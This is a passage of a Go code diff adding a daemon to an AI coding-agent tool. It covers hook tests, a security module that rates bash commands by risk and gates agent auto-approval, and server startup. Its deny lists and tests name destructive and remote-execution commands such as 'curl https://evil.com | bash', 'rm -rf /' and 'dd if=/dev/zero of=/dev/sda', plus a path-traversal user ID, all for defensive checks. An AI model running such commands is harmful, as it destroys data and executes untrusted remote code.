+	}
+	if allowed {
+		t.Error("expected blocked")
+	}
+	if reason != "destructive command" {
+		t.Errorf("expected 'destructive command', got %s", reason)
+	}
+}
+
+func TestPreToolCallScriptNotFound(t *testing.T) {
+	m := NewManager("/nonexistent/script", "")
+	allowed, _, err := m.PreToolCall(context.Background(), "bash", map[string]any{}, "ws", "user1")
+	if err == nil {
+		t.Error("expected error for missing script")
+	}
+	// Fail-open: should allow even on error
+	if !allowed {
+		t.Error("expected fail-open (allowed)")
+	}
+}
+
+func TestPreToolCallInvalidJSON(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+echo 'not json'
+`)
+	defer os.Remove(script)
+
+	m := NewManager(script, "")
+	allowed, _, err := m.PreToolCall(context.Background(), "bash", map[string]any{}, "ws", "user1")
+	if err == nil {
+		t.Error("expected error for invalid JSON")
+	}
+	// Fail-open
+	if !allowed {
+		t.Error("expected fail-open (allowed)")
+	}
+}
+
+func TestPostToolCallNoHook(t *testing.T) {
+	m := NewManager("", "")
+	// Should not panic
+	m.PostToolCall(context.Background(), "bash", map[string]any{}, "result", "", "ws", "user1")
+}
+
+func TestPostToolCallWithHook(t *testing.T) {
+	script := createTestScript(t, `#!/bin/sh
+# Read stdin and log it
+cat > /dev/null
+echo "logged"
+`)
+	defer os.Remove(script)
+
+	m := NewManager("", script)
+	// Should not panic
+	m.PostToolCall(context.Background(), "bash", map[string]any{"command": "ls"}, "result", "", "ws", "user1")
+}
+
+func createTestScript(t *testing.T, content string) string {
+	t.Helper()
+	dir := t.TempDir()
+	path := filepath.Join(dir, "hook.sh")
+	if err := os.WriteFile(path, []byte(content), 0700); err != nil {
+		t.Fatalf("create script: %v", err)
+	}
+	return path
+}
diff --git a/internal/hermes/security.go b/internal/hermes/security.go
new file mode 100644
index 0000000..39a82ea
--- /dev/null
+++ b/internal/hermes/security.go
@@ -0,0 +1,207 @@
+package hermes
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+)
+
+// Security provides user whitelist validation and smart approval logic for Hermes mode.
+type Security struct {
+	cfg *HermesConfig
+}
+
+// NewSecurity creates a security manager.
+func NewSecurity(cfg *HermesConfig) *Security {
+	return &Security{cfg: cfg}
+}
+
+// CheckUserAllowed returns nil if the user is allowed on the given platform.
+// Returns an error with reason if blocked.
+func (s *Security) CheckUserAllowed(platform, userID string) error {
+	var allowedUsers []string
+
+	switch platform {
+	case "wechat":
+		allowedUsers = s.cfg.Wechat.AllowedUsers
+	case "feishu":
+		allowedUsers = s.cfg.Feishu.AllowedUsers
+	case "ws":
+		// WebSocket clients are authenticated via token, no per-user whitelist
+		return nil
+	default:
+		return nil
+	}
+
+	// Empty whitelist = allow all (but warn in logs)
+	if len(allowedUsers) == 0 {
+		return nil
+	}
+
+	for _, allowed := range allowedUsers {
+		if allowed == userID {
+			return nil
+		}
+	}
+
+	return fmt.Errorf("user %s not in allowed_users for platform %s", userID, platform)
+}
+
+// CheckWorkDirAllowed returns nil if the working directory is allowed.
+func (s *Security) CheckWorkDirAllowed(workDir string) error {
+	allowed := s.cfg.Security.AllowedWorkDirs
+	if len(allowed) == 0 {
+		// No restriction
+		return nil
+	}
+
+	cleanWorkDir := filepath.Clean(workDir)
+	for _, dir := range allowed {
+		cleanAllowed := filepath.Clean(dir)
+		rel, err := filepath.Rel(cleanAllowed, cleanWorkDir)
+		if err == nil && (rel == "." || (rel != ".." && !strings.HasPrefix(rel, ".."+string(filepath.Separator)))) {
+			return nil
+		}
+	}
+
+	return fmt.Errorf("working directory %s not in allowed_work_dirs", workDir)
+}
+
+// CommandRiskLevel classifies the risk level of a bash command.
+// Returns "low", "medium", or "high".
+func CommandRiskLevel(command string) string {
+	command = strings.TrimSpace(command)
+
+	// High risk: destructive or system-level commands
+	highRiskPrefixes := []string{
+		"rm -rf", "rm -r",
+		"mkfs", "dd ",
+		"chmod 777", "chmod -R",
+		"chown -R",
+		"sudo ", "su ",
+		"shutdown", "reboot", "halt",
+		"kill -9", "killall",
+		"> /dev/", "curl | sh", "curl | bash", "wget | sh",
+		"eval ", "exec ",
+	}
+	for _, prefix := range highRiskPrefixes {
+		if strings.HasPrefix(command, prefix) || strings.Contains(command, " "+prefix) {
+			return "high"
+		}
+	}
+
+	// High risk: pipe to shell
+	if strings.Contains(command, "| sh") || strings.Contains(command, "| bash") {
+		return "high"
+	}
+
+	// Medium risk: file modifications, network, package management
+	mediumRiskPrefixes := []string{
+		"mv ", "cp -r",
+		"git push", "git reset --hard", "git clean",
+		"npm publish", "go install",
+		"apt ", "yum ", "brew ", "pip install",
+		"docker ", "kubectl ",
+		"curl ", "wget ",
+		"ssh ", "scp ",
+	}
+	for _, prefix := range mediumRiskPrefixes {
+		if strings.HasPrefix(command, prefix) {
+			return "medium"
+		}
+	}
+
+	// Low risk: read-only and common dev commands
+	lowRiskPrefixes := []string{
+		"go ", "make ", "npm ", "yarn ", "node ",
+		"python ", "pip ",
+		"git status", "git log", "git diff", "git branch",
+		"ls", "cat ", "head ", "tail ", "wc ",
+		"echo ", "printf ",
+		"grep ", "find ", "which ", "type ",
+		"cd ", "pwd", "env", "printenv",
+	}
+	for _, prefix := range lowRiskPrefixes {
+		if strings.HasPrefix(command, prefix) {
+			return "low"
+		}
+	}
+
+	return "medium" // default: unknown commands are medium risk
+}
+
+// ApprovalDecision represents the result of an approval check.
+type ApprovalDecision struct {
+	Approved  bool
+	Reason    string
+	RiskLevel string
+}
+
+// FormatApprovalNotification formats a notification for medium/high risk tool calls.
+func FormatApprovalNotification(toolName string, args map[string]any, riskLevel string, approved bool) string {
+	var icon, status string
+	if approved {
+		icon = "⚠️"
+		status = "auto-approved"
+	} else {
+		icon = "🚫"
+		status = "blocked"
+	}
+
+	var detail string
+	if toolName == "bash" {
+		if cmd, ok := args["command"]; ok {
+			cmdStr := fmt.Sprintf("%v", cmd)
+			if len(cmdStr) > 80 {
+				cmdStr = cmdStr[:80] + "..."
+			}
+			detail = cmdStr
+		}
+	} else {
+		if path, ok := args["path"]; ok {
+			detail = fmt.Sprintf("%v", path)
+		}
+	}
+
+	if detail != "" {
+		return fmt.Sprintf("%s [%s] %s %s (%s risk)", icon, toolName, detail, status, riskLevel)
+	}
+	return fmt.Sprintf("%s [%s] %s (%s risk)", icon, toolName, status, riskLevel)
+}
+
+// ShouldAutoApprove returns true if the tool call can be auto-approved in Hermes mode.
+// In Hermes mode, bots run unattended so we need stricter auto-approval rules.
+func (s *Security) ShouldAutoApprove(toolName string, args map[string]any, mode string) bool {
+	if !s.cfg.Security.SmartApprovals {
+		// Smart approvals disabled — fall back to mode-based behavior
+		return mode == "yolo"
+	}
+
+	switch toolName {
+	case "read", "ls", "grep", "find", "skill_ref", "memory", "plan", "jobs":
+		// Read-only tools: always auto-approve
+		return true
+
+	case "write", "edit":
+		// File modifications: auto-approve in agent/yolo mode
+		return mode == "agent" || mode == "yolo"
+
+	case "bash":
+		command, _ := args["command"].(string)
+		risk := CommandRiskLevel(command)
+		switch mode {
+		case "yolo":
+			return risk != "high" // yolo still blocks high-risk
+		case "agent":
+			return risk == "low" // agent only auto-approves low-risk
+		default:
+			return false
+		}
+
+	case "kill":
+		return mode == "agent" || mode == "yolo"
+
+	default:
+		return mode == "yolo"
+	}
+}
diff --git a/internal/hermes/security_test.go b/internal/hermes/security_test.go
new file mode 100644
index 0000000..30880f7
--- /dev/null
+++ b/internal/hermes/security_test.go
@@ -0,0 +1,173 @@
+package hermes
+
+import (
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestCheckUserAllowed(t *testing.T) {
+	cfg := &HermesConfig{
+		Wechat: WechatConfig{
+			AllowedUsers: []string{"wxid_alice", "wxid_bob"},
+		},
+		Feishu: FeishuConfig{
+			AllowedUsers: []string{"ou_charlie"},
+		},
+	}
+	sec := NewSecurity(cfg)
+
+	// Allowed user
+	if err := sec.CheckUserAllowed("wechat", "wxid_alice"); err != nil {
+		t.Errorf("alice should be allowed: %v", err)
+	}
+
+	// Blocked user
+	if err := sec.CheckUserAllowed("wechat", "wxid_stranger"); err == nil {
+		t.Error("stranger should be blocked")
+	}
+
+	// Feishu allowed
+	if err := sec.CheckUserAllowed("feishu", "ou_charlie"); err != nil {
+		t.Errorf("charlie should be allowed: %v", err)
+	}
+
+	// Feishu blocked
+	if err := sec.CheckUserAllowed("feishu", "ou_stranger"); err == nil {
+		t.Error("stranger should be blocked on feishu")
+	}
+
+	// WebSocket always allowed (token-based auth)
+	if err := sec.CheckUserAllowed("ws", "anyone"); err != nil {
+		t.Errorf("ws should always be allowed: %v", err)
+	}
+
+	// Empty whitelist = allow all
+	cfg2 := &HermesConfig{}
+	sec2 := NewSecurity(cfg2)
+	if err := sec2.CheckUserAllowed("wechat", "anyone"); err != nil {
+		t.Errorf("empty whitelist should allow all: %v", err)
+	}
+}
+
+func TestCheckWorkDirAllowedUsesPathBoundary(t *testing.T) {
+	cfg := &HermesConfig{
+		Security: SecurityConfig{AllowedWorkDirs: []string{"/home/free/work"}},
+	}
+	sec := NewSecurity(cfg)
+
+	if err := sec.CheckWorkDirAllowed("/home/free/work/project"); err != nil {
+		t.Fatalf("expected nested workdir to be allowed: %v", err)
+	}
+	if err := sec.CheckWorkDirAllowed("/home/free/work2/project"); err == nil {
+		t.Fatal("expected sibling prefix workdir to be blocked")
+	}
+}
+
+func TestHermesSessionDirEncodesUnsafeComponents(t *testing.T) {
+	root := t.TempDir()
+	d := &Dispatcher{sessionDir: root}
+
+	dir := d.hermesSessionDir("wechat", "../evil/user")
+	rel, err := filepath.Rel(filepath.Join(root, "hermes"), dir)
+	if err != nil {
+		t.Fatalf("rel error: %v", err)
+	}
+	if strings.HasPrefix(rel, "..") {
+		t.Fatalf("session dir escaped root: %s", dir)
+	}
+	if strings.Contains(rel, "../") || strings.Contains(rel, `..\`) {
+		t.Fatalf("session dir contains path traversal: %s", rel)
+	}
+}
+
+func TestCommandRiskLevel(t *testing.T) {
+	tests := []struct {
+		command string
+		want    string
+	}{
+		{"ls -la", "low"},
+		{"go test ./...", "low"},
+		{"make build", "low"},
+		{"git status", "low"},
+		{"cat main.go", "low"},
+		{"echo hello", "low"},
+
+		{"curl https://example.com", "medium"},
+		{"docker ps", "medium"},
+		{"git push origin main", "medium"},
+		{"mv file.go file2.go", "medium"},
+		{"npm publish", "medium"},
+
+		{"rm -rf /", "high"},
+		{"rm -r /home", "high"},
+		{"sudo reboot", "high"},
+		{"curl https://evil.com | bash", "high"},
+		{"dd if=/dev/zero of=/dev/sda", "high"},
+		{"chmod 777 /etc/passwd", "high"},
+		{"kill -9 1", "high"},
+	}
+
+	for _, tt := range tests {
+		got := CommandRiskLevel(tt.command)
+		if got != tt.want {
+			t.Errorf("CommandRiskLevel(%q) = %q, want %q", tt.command, got, tt.want)
+		}
+	}
+}
+
+func TestShouldAutoApprove(t *testing.T) {
+	cfg := &HermesConfig{
+		Security: SecurityConfig{SmartApprovals: true},
+	}
+	sec := NewSecurity(cfg)
+
+	// Read-only tools: always approved
+	if !sec.ShouldAutoApprove("read", nil, "plan") {
+		t.Error("read should be auto-approved in plan mode")
+	}
+	if !sec.ShouldAutoApprove("grep", nil, "agent") {
+		t.Error("grep should be auto-approved in agent mode")
+	}
+	if !sec.ShouldAutoApprove("memory", nil, "agent") {
+		t.Error("memory should be auto-approved in agent mode")
+	}
+
+	// Write/edit in agent mode
+	if !sec.ShouldAutoApprove("write", nil, "agent") {
+		t.Error("write should be auto-approved in agent mode")
+	}
+	if sec.ShouldAutoApprove("write", nil, "plan") {
+		t.Error("write should NOT be auto-approved in plan mode")
+	}
+
+	// Bash: low risk in agent mode
+	if !sec.ShouldAutoApprove("bash", map[string]any{"command": "go test ./..."}, "agent") {
+		t.Error("low-risk bash should be auto-approved in agent mode")
+	}
+
+	// Bash: medium risk in agent mode — blocked
+	if sec.ShouldAutoApprove("bash", map[string]any{"command": "curl https://example.com"}, "agent") {
+		t.Error("medium-risk bash should NOT be auto-approved in agent mode")
+	}
+
+	// Bash: high risk in yolo — blocked
+	if sec.ShouldAutoApprove("bash", map[string]any{"command": "rm -rf /"}, "yolo") {
+		t.Error("high-risk bash should NOT be auto-approved even in yolo")
+	}
+
+	// Bash: medium risk in yolo — allowed
+	if !sec.ShouldAutoApprove("bash", map[string]any{"command": "docker ps"}, "yolo") {
+		t.Error("medium-risk bash should be auto-approved in yolo")
+	}
+
+	// Smart approvals disabled
+	cfg2 := &HermesConfig{Security: SecurityConfig{SmartApprovals: false}}
+	sec2 := NewSecurity(cfg2)
+	if sec2.ShouldAutoApprove("bash", map[string]any{"command": "ls"}, "agent") {
+		t.Error("with smart_approvals=false, agent mode should not auto-approve")
+	}
+	if !sec2.ShouldAutoApprove("bash", map[string]any{"command": "ls"}, "yolo") {
+		t.Error("with smart_approvals=false, yolo mode should auto-approve")
+	}
+}
diff --git a/internal/hermes/server.go b/internal/hermes/server.go
new file mode 100644
index 0000000..65ba848
--- /dev/null
+++ b/internal/hermes/server.go
@@ -0,0 +1,569 @@
+package hermes
+
+import (
+	"context"
+	"fmt"
+	"log"
+	"net/http"
+	"os"
+	"os/signal"
+	"path/filepath"
+	"syscall"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/a2a"
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes/webhook"
+	"github.com/startvibecoding/vibecoding/internal/hermes/ws"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging"
+	"github.com/startvibecoding/vibecoding/internal/messaging/feishu"
+	"github.com/startvibecoding/vibecoding/internal/messaging/wechat"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// RunOptions holds CLI flags for the hermes start command.
+type RunOptions struct {
+	ConfigPath string
+	Port       int
+	WorkDir    string
+	Provider   string
+	Model      string
+	MultiAgent bool
+	Sandbox    bool
+	Daemon     bool
+	Verbose    bool
+	Debug      bool
+}
+
+// Server is the Hermes daemon.
+type Server struct {
+	cfg        *HermesConfig
+	settings   *config.Settings
+	version    string
+	gateway    *ws.Gateway
+	dispatcher *Dispatcher
+	platforms  []messaging.Platform
+	scheduler  *cron.Scheduler
+}
+
+// PIDFilePath returns the path to the hermes PID file.
+func PIDFilePath() string {
+	return filepath.Join(config.ConfigDir(), "hermes.pid")
+}
+
+// writePIDFile writes the current process PID to the PID file.
+func writePIDFile() error {
+	path := PIDFilePath()
+	if err := os.MkdirAll(filepath.Dir(path), 0700); err != nil {
+		return err
+	}
+	return os.WriteFile(path, []byte(fmt.Sprintf("%d\n", os.Getpid())), 0600)
+}
+
+// removePIDFile removes the PID file if it exists.
+func removePIDFile() {
+	os.Remove(PIDFilePath())
+}
+
+// ReadPIDFile reads the PID from the PID file. Returns 0 if not found.
+func ReadPIDFile() (int, error) {
+	data, err := os.ReadFile(PIDFilePath())
+	if err != nil {
+		if os.IsNotExist(err) {
+			return 0, nil
+		}
+		return 0, err
+	}
+	var pid int
+	fmt.Sscanf(string(data), "%d", &pid)
+	return pid, nil
+}
+
+// Run starts the Hermes server.
+func Run(opts RunOptions, version string) error {
+	config.Verbose = opts.Verbose || opts.Debug
+	if opts.Debug {
+		_ = os.Setenv("VIBECODING_DEBUG", "1")
+	}
+
+	// Load settings.json
+	settings, err := config.LoadSettings()
+	if err != nil {
+		return fmt.Errorf("load settings: %w", err)
+	}
+
+	// Load hermes.json
+	var cfg *HermesConfig
+	if opts.ConfigPath != "" {
+		cfg, err = LoadHermesConfigFrom(opts.ConfigPath)
+	} else {
+		cfg, err = LoadHermesConfig()
+	}
+	if err != nil {
+		return fmt.Errorf("load hermes config: %w", err)
+	}
+
+	// CLI flag overrides
+	if opts.Port != 0 {
+		cfg.Server.Port = opts.Port
+	}
+	if opts.WorkDir != "" {
+		cfg.WorkDir = opts.WorkDir
+	}
+	if opts.Provider != "" {
+		cfg.DefaultProvider = opts.Provider
+	}
+	if opts.Model != "" {
+		cfg.DefaultModel = opts.Model
+	}
+	if opts.MultiAgent {
+		cfg.MultiAgent = true
+	}
+	if opts.Sandbox {
+		cfg.Sandbox = true
+	}
+
+	// Resolve working directory
+	if cfg.WorkDir == "" || cfg.WorkDir == "." {
+		cwd, err := os.Getwd()
+		if err != nil {
+			return fmt.Errorf("get working directory: %w", err)
+		}
+		cfg.WorkDir = cwd
+	}
+
+	// Create cron store (always when cron enabled, for tool registration)
+	var cronStore cron.CronStore
+	var cronScheduler *cron.Scheduler
+	if cfg.Cron.Enabled {
+		storePath := cfg.Cron.StorePath
+		if storePath == "" {
+			storePath = filepath.Join(config.ConfigDir(), "hermes-cron.json")
+		}
+		cronStore = cron.NewFileCronStore(storePath)
+	}
+
+	// Create dispatcher
+	dispatcher, err := NewDispatcher(cfg, settings, version, cronStore, cronScheduler)
+	if err != nil {
+		return fmt.Errorf("create dispatcher: %w", err)
+	}
+
+	// Create and start cron scheduler if multi-agent is available
+	if cfg.Cron.Enabled && dispatcher.agentMgr != nil {
+		interval := time.Duration(cfg.Cron.Interval) * time.Second
+		if interval <= 0 {
+			interval = 30 * time.Second
+		}
+		cronScheduler = cron.NewScheduler(cronStore, dispatcher.agentMgr, interval)
+		cronScheduler.Start()
+	}
+
+	// Create gateway
+	gw := ws.NewGateway(cfg.GetListenAddr(), cfg.Server.AuthToken, version)
+	gw.SetDispatcher(newWSDispatcherAdapter(dispatcher))
+
+	// Set memory store for /api/memory
+	memStore := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+	gw.SetMemoryStore(memStore)
+
+	// webhook handler is stored here so we can wire platforms after startPlatforms
+	var webhookHandler *WebhookHandler
+
+	// Register webhook routes if configured
+	if cfg.Webhooks.Enabled && len(cfg.Webhooks.Routes) > 0 {
+		var routes []webhook.RouteConfig
+		for _, r := range cfg.Webhooks.Routes {
+			routes = append(routes, webhook.RouteConfig{
+				Path:           r.Path,
+				Events:         r.Events,
+				Skill:          r.Skill,
+				Delivery:       r.Delivery,
+				DeliveryTarget: r.DeliveryTarget,
+			})
+		}
+		webhookHandler = NewWebhookHandler(dispatcher, nil) // platforms wired after startPlatforms
+		router := webhook.NewRouter(routes, cfg.Webhooks.Secret, webhookHandler)
+		gw.RegisterHandler("/webhook/", router)
+	}
+
+	// Register A2A routes if enabled
+	if cfg.A2A.Enabled {
+		a2aCfg := &a2a.Config{
+			Enabled: true,
+			Port:    cfg.A2A.Port,
+			Host:    cfg.Server.Host,
+			WorkDir: cfg.GetWorkDir(),
+		}
+		if a2aCfg.Port == 0 {
+			a2aCfg.Port = 8093
+		}
+		executor := a2a.NewDefaultExecutor(&hermesA2AFactory{dispatcher: dispatcher})
+		a2aSrv := a2a.NewServer(a2aCfg, version, executor)
+		a2aSrv.RegisterRoutes(gw.GetMux())
+		log.Printf("[hermes] A2A routes registered on hermes gateway")
+	}
+
+	srv := &Server{
+		cfg:        cfg,
+		settings:   settings,
+		version:    version,
+		gateway:    gw,
+		dispatcher: dispatcher,
+		scheduler:  cronScheduler,
+	}
+
+	// Print startup info
+	fmt.Fprintf(os.Stderr, "VibeCoding Hermes v%s starting\n", version)
+	fmt.Fprintf(os.Stderr, "  Gateway: http://%s\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WebSocket: ws://%s/ws\n", cfg.GetListenAddr())
+	fmt.Fprintf(os.Stderr, "  WorkDir: %s\n", cfg.GetWorkDir())
+	fmt.Fprintf(os.Stderr, "  Provider: %s\n", cfg.GetDefaultProvider(settings.DefaultProvider))
+	fmt.Fprintf(os.Stderr, "  Model: %s\n", cfg.GetDefaultModel(settings.DefaultModel))
+	if cfg.Server.AuthToken != "" {
+		fmt.Fprintf(os.Stderr, "  Auth: enabled\n")
+	} else {
+		fmt.Fprintf(os.Stderr, "  Auth: disabled\n")
+	}
+	if cfg.MultiAgent {
+		fmt.Fprintf(os.Stderr, "  Multi-agent: enabled\n")
+	}
+	if cfg.Sandbox {
+		fmt.Fprintf(os.Stderr, "  Sandbox: enabled\n")
+	} else {
+		fmt.Fprintf(os.Stderr, "  Sandbox: disabled\n")
+	}
+
+	if cfg.Cron.Enabled {
+		if cronScheduler != nil {
+			fmt.Fprintf(os.Stderr, "  Cron: enabled\n")
+		} else {
+			fmt.Fprintf(os.Stderr, "  Cron: disabled (requires --multi-agent)\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Cron: disabled\n")
+	}
+
+	if cfg.Webhooks.Enabled && len(cfg.Webhooks.Routes) > 0 {
+		fmt.Fprintf(os.Stderr, "  Webhooks: %d routes\n", len(cfg.Webhooks.Routes))
+	} else {
+		fmt.Fprintf(os.Stderr, "  Webhooks: disabled\n")
+	}
+
+	// Start messaging platforms
+	srv.startPlatforms()
+
+	// Wire platform map into webhook handler now that platforms are started
+	if webhookHandler != nil && len(srv.platforms) > 0 {
+		pm := make(map[string]messaging.Platform, len(srv.platforms))
+		for _, p := range srv.platforms {
+			pm[p.Name()] = p
+		}
+		webhookHandler.SetPlatforms(pm)
+	}
+
+	// Start gateway (blocking)
+	errCh := make(chan error, 1)
+	go func() {
+		if err := gw.Start(); err != nil && err != http.ErrServerClosed {
+			errCh <- err
+		}
+	}()
+
+	fmt.Fprintf(os.Stderr, "\nReady to serve.\n")
+
+	// Write PID file for stop/status commands
+	if err := writePIDFile(); err != nil {
+		log.Printf("Warning: could not write PID file: %v", err)
+	} else {
+		defer removePIDFile()
+	}
+
+	// Wait for interrupt
+	sigCh := make(chan os.Signal, 1)
+	signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM)
+
+	select {
+	case err := <-errCh:
+		return fmt.Errorf("gateway error: %w", err)
+	case sig := <-sigCh:
+		fmt.Fprintf(os.Stderr, "\nReceived %s, shutting down...\n", sig)
+		srv.stop()
+	}
+
+	return nil
+}
+
+// startPlatforms connects to enabled messaging platforms.
+func (srv *Server) startPlatforms() {
+	if srv.cfg.Wechat.Enabled {
+		credPath := srv.cfg.GetWechatCredPath()
+		creds, err := wechat.LoadCredentials(credPath)
+		if err != nil || creds == nil {
+			fmt.Fprintf(os.Stderr, "  WeChat: enabled but not logged in — run 'vibecoding hermes wechat login'\n")
+		} else {
+			bot := wechat.NewBot(wechat.BotOptions{
+				CredPath:   credPath,
+				AutoTyping: srv.cfg.Wechat.AutoTyping,
+			})
+			srv.platforms = append(srv.platforms, bot)
+			fmt.Fprintf(os.Stderr, "  WeChat: connected (user: %s, work_dir: %s)\n", creds.UserID, srv.cfg.GetPlatformWorkDir("wechat"))
+
+			// Start in background
+			go func() {
+				if err := bot.Start(context.Background(), func(ctx context.Context, msg messaging.InboundMessage) (string, error) {
+					return srv.dispatcher.HandleMessage(ctx, msg)
+				}); err != nil {
+					log.Printf("[wechat] Platform stopped: %v", err)
+				}
+			}()
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  WeChat: disabled\n")
+	}
+
+	if srv.cfg.Feishu.Enabled {
+		if srv.cfg.Feishu.AppID == "" || srv.cfg.Feishu.AppSecret == "" {
+			fmt.Fprintf(os.Stderr, "  Feishu: enabled but app_id/app_secret not configured\n")
+		} else {
+			bot := feishu.NewBot(feishu.BotOptions{
+				AppID:     srv.cfg.Feishu.AppID,
+				AppSecret: srv.cfg.Feishu.AppSecret,
+			})
+			srv.platforms = append(srv.platforms, bot)
+			fmt.Fprintf(os.Stderr, "  Feishu: connecting (work_dir: %s)\n", srv.cfg.GetPlatformWorkDir("feishu"))
+
+			go func() {
+				if err := bot.Start(context.Background(), func(ctx context.Context, msg messaging.InboundMessage) (string, error) {
+					return srv.dispatcher.HandleMessage(ctx, msg)
+				}); err != nil {
+					log.Printf("[feishu] Platform stopped: %v", err)
+				}
+			}()
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Feishu: disabled\n")
+	}
+
+	if srv.cfg.Cron.Enabled {
+		if srv.scheduler == nil {
+			fmt.Fprintf(os.Stderr, "  Cron: disabled (requires --multi-agent)\n")
+		}
+	} else {
+		fmt.Fprintf(os.Stderr, "  Cron: disabled\n")
+	}
+
+	if srv.cfg.A2A.Enabled {
+		fmt.Fprintf(os.Stderr, "  A2A: enabled\n")
+	}
+}
+
+// hermesA2AFactory creates agents for A2A task execution via hermes dispatcher.
+type hermesA2AFactory struct {
+	dispatcher *Dispatcher
+}
+
+func (f *hermesA2AFactory) CreateForA2A(workDir string, mode string) (*agent.Agent, error) {
+	if workDir == "" {
+		workDir = f.dispatcher.cfg.GetWorkDir()
+	}
+	// Create a new agent using the dispatcher's provider and settings
+	a := agent.New(agent.Config{
+		Provider:   f.dispatcher.provider,
+		Model:      f.dispatcher.model,
+		Mode:       mode,
+		SandboxMgr: sandbox.NewManager(workDir),
+		Settings:   f.dispatcher.settings,
+	}, tools.NewRegistry(workDir, sandbox.NewManager(workDir).GetActive()))
+	return a, nil
+}
+
+// stop gracefully shuts down all components.
+func (srv *Server) stop() {
+	// Stop cron scheduler
+	if srv.scheduler != nil {
+		srv.scheduler.Stop()
+	}
+
+	// Stop messaging platforms
+	for _, p := range srv.platforms {
+		log.Printf("Stopping platform: %s", p.Name())
+		p.Stop()
+	}
+
+	// Stop gateway
+	if err := srv.gateway.Stop(10 * time.Second); err != nil {
+		log.Printf("Gateway shutdown error: %v", err)
+	}
+}
+
+// --- WS Dispatcher adapter ---
+// Bridges hermes.Dispatcher to ws.Dispatcher interface.
+
+type wsDispatcherAdapter struct {
+	d *Dispatcher
+}
+
+func newWSDispatcherAdapter(d *Dispatcher) *wsDispatcherAdapter {
+	return &wsDispatcherAdapter{d: d}
+}
+
+func (a *wsDispatcherAdapter) HandleWSMessage(ctx context.Context, connID, text string, eventCh chan<- ws.WSEvent) error {
+	// Command path
+	if len(text) > 0 && text[0] == '/' {
+		result := a.d.handleCommandForWS(connID, text)
+		eventCh <- ws.WSEvent{
+			Type:    "command_result",
+			Command: text,
+			Message: result,
+		}
+		eventCh <- ws.WSEvent{Type: "done", StopReason: "end_turn"}
+		return nil
+	}
+
+	// Regular message — run agent with streaming
+	sess, err := a.d.resolveSession("ws", connID)
+	if err != nil {
+		return err
+	}
+
+	sess.Lock()
+	defer sess.Unlock()
+	sess.Touch()
+
+	// Run agent in goroutine, convert agent events to ws events
+	agentCh := make(chan agent.Event, 100)
+	errCh := make(chan error, 1)
+	go func() {
+		errCh <- a.d.runAgentStreaming(ctx, sess, text, agentCh)
+	}()
+
+	for ev := range agentCh {
+		wsev := agentEventToWSEvent(ev)
+		eventCh <- wsev
+	}
+
+	if err := <-errCh; err != nil {
+		eventCh <- ws.WSEvent{Type: "error", Message: err.Error()}
+	}
+	return nil
+}
+
+// agentEventToWSEvent converts an agent.Event to a ws.WSEvent.
+func agentEventToWSEvent(ev agent.Event) ws.WSEvent {
+	switch ev.Type {
+	case agent.EventTextDelta:
+		return ws.WSEvent{Type: "text_delta", Content: ev.TextDelta}
+	case agent.EventThinkDelta:
+		return ws.WSEvent{Type: "think_delta", Content: ev.ThinkDelta}
+	case agent.EventToolCall:
+		evTool := ws.WSEvent{
+			Type:   "tool_call",
+			Tool:   ev.ToolName,
+			CallID: ev.ToolCallID,
+			Args:   ev.ToolArgs,
+		}
+		if ev.ToolCall != nil {
+			evTool.Tool = ev.ToolCall.Name
+			evTool.CallID = ev.ToolCall.ID
+		}
+		return evTool
+	case agent.EventToolExecutionEnd:
+		name := ev.ToolName
+		if name == "" && ev.ToolCall != nil {
+			name = ev.ToolCall.Name
+		}
+		result := ws.WSEvent{
+			Type:   "tool_result",
+			Tool:   name,
+			CallID: ev.ToolCallID,
+			Result: ev.ToolResult,
+		}
+		if ev.ToolError != nil {
+			result.Code = "error"
+			result.Message = ev.ToolError.Error()
+		}
+		if ev.ToolDiff != nil {
+			result.Type = "tool_diff"
+			result.Path = ev.ToolDiff.Path
+			result.Diff = ev.ToolDiff.Unified
+		}
+		return result
+	case agent.EventContextPressure, agent.EventBudgetPressure:
+		return ws.WSEvent{
+			Type:    "status",
+			Message: ev.PressureMessage,
+		}
+	case agent.EventToolApprovalRequest:
+		return ws.WSEvent{
+			Type:       "approval_request",
+			ApprovalID: ev.ApprovalID,
+			Tool:       ev.ApprovalTool,
+			Args:       ev.ApprovalArgs,
+		}
+	case agent.EventDone:
+		return ws.WSEvent{Type: "done", StopReason: ev.StopReason}
+	case agent.EventStatus:
+		return ws.WSEvent{Type: "status", Message: ev.StatusMessage}
+	case agent.EventError:
+		msg := ""
+		if ev.Error != nil {
+			msg = ev.Error.Error()
+		}
+		return ws.WSEvent{Type: "error", Message: msg, Code: ev.StopReason}
+	case agent.EventUsage:
+		evWS := ws.WSEvent{Type: "usage"}
+		if ev.Usage != nil {
+			evWS.PromptTokens = ev.Usage.PromptTokens()
+			evWS.CompletionTokens = ev.Usage.Output
+			evWS.TotalTokens = ev.Usage.TotalTokens
+			evWS.CacheReadTokens = ev.Usage.CacheRead
+			evWS.CacheWriteTokens = ev.Usage.CacheWrite
+		}
+		return evWS
+	default:
+		// Skip lifecycle events (AgentStart, AgentEnd, TurnStart, TurnEnd, etc.)
+		return ws.WSEvent{}
+	}
+}
+
+func (a *wsDispatcherAdapter) ListSessions() []ws.SessionInfo {
+	sessions := a.d.ListSessions()
+	result := make([]ws.SessionInfo, 0, len(sessions))
+	for _, s := range sessions {
+		msgs := s.Manager.GetMessages()
+		preview := ""
+		for _, m := range msgs {
+			if m.Role == "user" {
+				preview = m.Content
+				if len(preview) > 60 {
+					preview = preview[:60] + "..."
+				}
+				break
+			}
+		}
+		result = append(result, ws.SessionInfo{
+			ID:           s.ID,
+			Platform:     s.Platform,
